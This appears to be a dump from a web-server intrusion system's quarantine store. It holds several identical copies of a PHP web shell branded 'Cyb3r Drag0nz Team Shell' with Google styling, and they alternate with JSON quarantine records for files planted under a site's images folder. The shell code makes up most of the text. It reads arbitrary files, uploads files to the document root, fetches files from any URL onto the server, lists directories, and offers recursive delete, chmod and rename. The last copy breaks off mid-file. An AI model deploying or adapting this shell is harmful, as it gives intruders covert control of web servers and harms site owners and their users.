|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5200",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:images/ko6h7s5e9kak.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783381493,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "images/ko6h7s5e9kak.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.phtml.json
Normal file
320
var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.phtml.json
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5174",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:images/ko6h7s5e9kak.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.phtml.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783381491,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "images/ko6h7s5e9kak.phtml.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
